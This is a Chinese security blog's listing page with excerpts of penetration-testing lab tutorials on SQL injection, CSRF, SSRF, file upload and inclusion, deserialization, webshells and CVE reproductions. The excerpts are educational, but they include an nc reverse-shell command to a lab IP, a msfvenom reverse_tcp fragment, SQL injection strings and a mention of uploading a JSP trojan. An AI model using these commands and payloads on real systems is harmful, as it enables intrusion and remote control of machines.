自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(20)
  • 收藏
  • 关注

原创 常见网络安全设备

一、防火墙定位:访问控制类产品,网络出现后的第一类安全产品。功能:隔离内网、外网以及DMZ区(业务系统对外发布区,Web应用服务器,邮件服务器等)并控制用户访问。部署方式:通常部署在网络边界或者重要系统边界。通常工作在网络层。二、IPS定位:访问控制类产品,入侵防御系统。功能:能够对流经设备的网络流量进行分析、监控,最重要的是发现攻击后,能够及时拦截阻断。它是防火墙的重要补充。如果说防火墙是第一道防御线,那么IPS就是第二道。部署方式:通常串接在网络主干链路上,或者重要业务系统边界,通常由防火

2021-06-03 10:23:09 8646 1

原创 [极客大挑战 2019]BabySQL 1

一、获取flag流程我们先随便输入一个账号密码,查看URL发现是通过PUT方式传递数据到后台的。我们首先判断是否存在SQL注入,我们尝试在username参数后加一个“ ’ ”,发现数据库直接爆出了错误,说明是存在注入的。接下来我们用万能密码试一下,首先我们判断下这里是字符型注入还是数值型注入,先尝试1’ or ‘1’=‘1%23发现不可行,所以我们再尝试数值型注入,输入:1’ or 1=1%23,爆出了数据库错误,猜测是过滤了or(其实这里也过滤了and),尝试双写or试下,成功爆出。p

2021-05-26 18:00:38 1640 1

原创 CSRF漏洞

什么是CSRF?CSRF就是跨站请求伪造,由于其具有一次性,故也被称为:One Click Attack 或session Riding。攻击者利用目标用户的身份,以目标用户的身份执行某些非法操作。CSRF能够做什么?以目标用户的名义发送邮件,发消息,盗取用户账号,甚至购买商品,虚拟货币转账,这会泄露个人隐私并威胁到用户财产安全。CSRF形成条件(1)用户登录了网站,能够执行网站功能。(2)目标用户访问了攻击者构造的URL。(3)session或cookie有效。实例我们以pikachu靶

2021-05-25 20:26:41 182

原创 宽字节注入和报错注入

宽字节注入1.什么是宽字节当某字符的大小为一个字节时,称其字符为窄字节;当某字符的大小为两个字节时,称其字符为宽字节;所有英文默认占一个字节,汉字占两个字节。常见的宽字节编码:GB2312,GBK,GB18030,BIG5,Shift_JIS等等2.注入条件(1)数据库使用了gbk编码.(2)使用了过滤函数,将用户输入的单引号转义(mysql_real_escape_string,addslashes)这样被处理后的sql语句中,单引号不再具有‘作用’,仅仅是‘内容’而已,换句话说,这个单

2021-05-25 20:15:03 534

原创 Windows下反弹shell的方式

一、Windows下反弹shell1.nc反弹(1)我们先在被控制主机下载netcat。netcat下载(2)cmd下打开下载目录,输入:nc 192.168.59.131 9999 -e C:\Users\21124\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\cmd.exe(本机cmd文件路径)(3)可以看到shell是反弹回来的,但是可能由于防火墙的原因,控制极其不稳定。2.msf反弹(1)

2021-05-25 20:12:39 6645 1

原创 Linux下反弹shell的方式

一、什么是shell?shell是渗透中常用的名词,像getshell,webshell,反弹shell等等,都和shell相关。getshell:获取到目标的命令执行权限。webshell:指网站后门,通过web服务进行命令执行。反弹shell:把命令行的输入输出转移到其它主机。Shell 俗称壳(用来区别于核),是指“为使用者提供操作界面”的软件(命令解析器)。它类似于DOS下的command.com和后来的cmd.exe。它接收用户命令,然后调用相应的应用程序。简单说用户通过壳(shell)

2021-05-25 20:12:15 982

原创 远程命令执行和远程代码执行

一、远程命令执行和远程代码是怎样形成的?RCE(remote command/code execute)概述RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。远程系统命令执行一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口。比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。 而如

2021-05-22 16:06:26 5359 2

原创 SSRF

一、SSRF是什么?SSRF是由一种攻击者构造请求,由服务器端发起请求的安全漏洞。一般情况下SSRF的攻击目标是外网无法访问到的内部系统。(正因为请求是由服务器发起的,所以服务器端能请求到与自身相连而与外网隔离的内部系统。)二、SSRF是怎样形成的?SSRF的形成大多是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。三、SSRF主要攻击方式(1)对外网,服务器所在内网、本地进行端口扫描,获取一些服务的banner信息。(2)攻击运行在内网或本地的应用程序。(3)对内

2021-05-17 11:35:36 4193 1

原创 文件包含

一、什么是文件包含?文件包含,是一个功能。在各种开发语言中都提供了内置的文件包含函数,其可以使开发人员在一个代码文件中直接包含(引入)另外一个代码文件。 比如 在PHP中,提供了:include( )当使用该函数包含文件时,只有代码执行到 include()函数时才将文件包含进来,发生错误时之给出一个警告,继续向下执行。include_once( )功能与 Include()相同,区别在于当重复调用同一文件时,程序只调用一次require( )require()与 include()的区别在

2021-05-14 22:50:40 8264 6

原创 SQL注入之盲注(boolean盲注和时间盲注)

一、boolen盲注boolen就是系统屏蔽返回错误信息,只返回是或不是,所以我们不能直观的得到数据库信息,在这里,我们就只能通过boolen盲注进行注入。我们依旧使用pikachu靶场进行测试,这里肯定是存在SQL注入的,就不再多作演示。我们先看一下为什么这里只能用boolen注入。我们在union和boolen注入处都输入:kobe' order by 3#可以看到,uhion注入是不屏蔽报错信息的,而boolen注入只显示你输入有误,屏蔽了报错信息。而只有当我们输入正确的时候,才会返

2021-05-12 10:27:19 776

原创 union注入之字符型注入和数值型注入

什么是SQL注入?SQL注入就是web应用程序对用户输入数据的合法性没有判断,前端传入后端的参数是攻击者可控的,并且参数带进数据库查询,攻击者可以通过构造不同的SQL语句实现对数据库的任意操作。字符型注入判断方法:当输入的参数类型为字符型时,数据库执行的查询语句为:select * from users where id=‘x’,我们可以使用’1’=‘1和’1’=‘2判断是否存在SQL注入。url 地址中输入 http://xxx/abc.php?id= x’ and ‘1’=‘1 页面运行正常,继

2021-05-12 10:26:48 731

原创 Tomcat任意文件上传漏洞(CVE-2017-12615)复现

一、漏洞概述二、复现过程1.打开vulhub搭建该靶场环境。2.浏览器访问:http://192.168.59.131:8080/,并用burp抓包。3.用burp抓包,然后将其放到重发器中,修改上传方式并上传一个jsp木马。PS:在这里修改上传方式的时候要注意原先GET后面的空格,如果删除将会造成上传不成功。4.上传成功后访问我们上传的文件并将参数代入执行。...

2021-05-10 10:36:47 670

原创 Weblogic任意文件上传漏洞(CVE-2018-2894)复现

一、漏洞概述1、Weblogic管理端未授权的两个页面存在任意上传jsp文件漏洞,进而获取服务器权限。2、Oracle 7月更新中,修复了Weblogic Web Service Test Page中一处任意文件上传漏洞,Web Service Test Page 在 ‘生产模式’ 下默认不开启,所以该漏洞有一定限制。两个页面分别为/ws_utc/begin.do、/ws_utc/config.do。3、影响版本:weblogic 10.3.6.0、weblogic 12.1.3.0、weblogic

2021-05-09 19:57:29 335 1

原创 渗透测试集成靶场vulhub的搭建

渗透测试集成靶场vulfocus的搭建在搭建该靶场之前,我们需要先将docker环境配置好。搭建步骤如下:1.安装https协议、CA证书、dirmngrapt-get update apt-get install -y apt-transport-https ca-certificates apt-get install dirmngr2.添加GPG密钥并添加更新源curl -fsSL https://mirrors.tuna.tsinghua.edu.cn/docker-ce/lin

2021-05-09 19:56:45 2299

原创 如何向mysql写入wbeshell

如何向mysql写入wbeshell一、成功写入wbeshell必须满足的4个条件:(1)数据库拥有root权限或拥有file权限。(2)知道网站的绝对路径。(3)PHP的GPC参数为OFF状态。(4)MYSQL中的secure_file_priv参数不能为NULL。二、写入方法1.使用outfile方法。outfile是mysql提供的一个用来写入文件的函数,当我们可以控制写入文件的内容以及文件的保存路径时,我们就可以上传一个webshell。2.基于日志写入法。将日志文件的导出目录修改成

2021-03-23 19:09:35 906

原创 冰蝎之初使用

冰蝎的安装及使用一、安装下载地址:下载点这里解压之后双击:Behinder_v3.0_Beta6_win.jar二:连接一个shell环境:phpstudy+冰蝎测试环境是否搭建成功:浏览器访问本地网址可以看到环境搭建成功。接下来在网站根目录下新建一个shell2.php的文件,然后将冰蝎文件夹里server中的shell.php复制到shell.php中。可以看到连接密码为rebeyond。接下来在冰蝎中新增一个webshell...

2021-03-19 22:58:47 3048

原创 常见的几个名词术语

1.CMS:CMS是Content Management System的缩写,意为"内容管理系统"。 内容管理系统是企业信息化建设和电子政务的新宠,也是一个相对较新的市场。对于内容管理,业界还没有一个统一的定义,不同的机构有不同的理解。UAC:用户帐户控制(User Account Control,简写作UAC)是微软公司在其Windows Vista及更高版本操作系统中采用的一种控制机制。其原理是通知用户是否对应用程序使用硬盘驱动器和系统文件授权,以达到帮助阻止恶意程序(有时也称为“恶意软件”)损坏系统

2021-03-08 21:18:10 183

原创 PHP反序列化

**PHP反序列化漏洞**一、序列化定义:序列化(serialization)在计算机科学的数据处理中,是指将数据结构或对象状态转换成可取用格式(例如存成文件,存于缓冲,或经由网络中发送),以留待后续在相同或另一台计算机环境中,能恢复原先状态的过程。概念很容易理解,其实就是将数据转化成一种可逆的数据结构,自然,逆向的过程就叫做反序列化。二、PHP序列化函数序列化serialize()序列化通俗点说就是把一个对象变成可以传输的字符串,比如...

2021-03-06 15:23:58 126 1

原创 文件上传

**文件上传**一.漏洞成因:上传文件时,服务器端代码未对客户上传的文件进行严格的验证和过滤。二.文件上传方式1.JS检测绕过成因:如果上传的文件名后缀不合法,则会弹窗告知,此时上传文件的数据包并没有发送到服务端,只是在客户端浏览器使用JavaScript对数据包进行检测。绕过方法:(1).使用浏览器的插件,删除检测文件后缀的JS代码,然后上传即可绕过。(2).首先把需要上传的文件后缀改成允许上传的,绕过JS检测,再抓包,...

2021-03-06 10:10:57 5899 3

原创 后渗透之获取普通session

后渗透之获取普通session一:所需环境:1.kali Linux(攻击机) 2.windows7(靶机)二:实验步骤:1.在kali终端使用命令msfconsole进入metasploit框架。(msf5)2.使用命令use exploit/multi/handler进入侦听模块。3.利用msfvenom命令生成一个shell文件。命令如下:Linux:msfvenom -p linux/x64/meterpreter/reverse_tcp lhost= lport= -f elf

2020-12-29 11:06:43 512

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除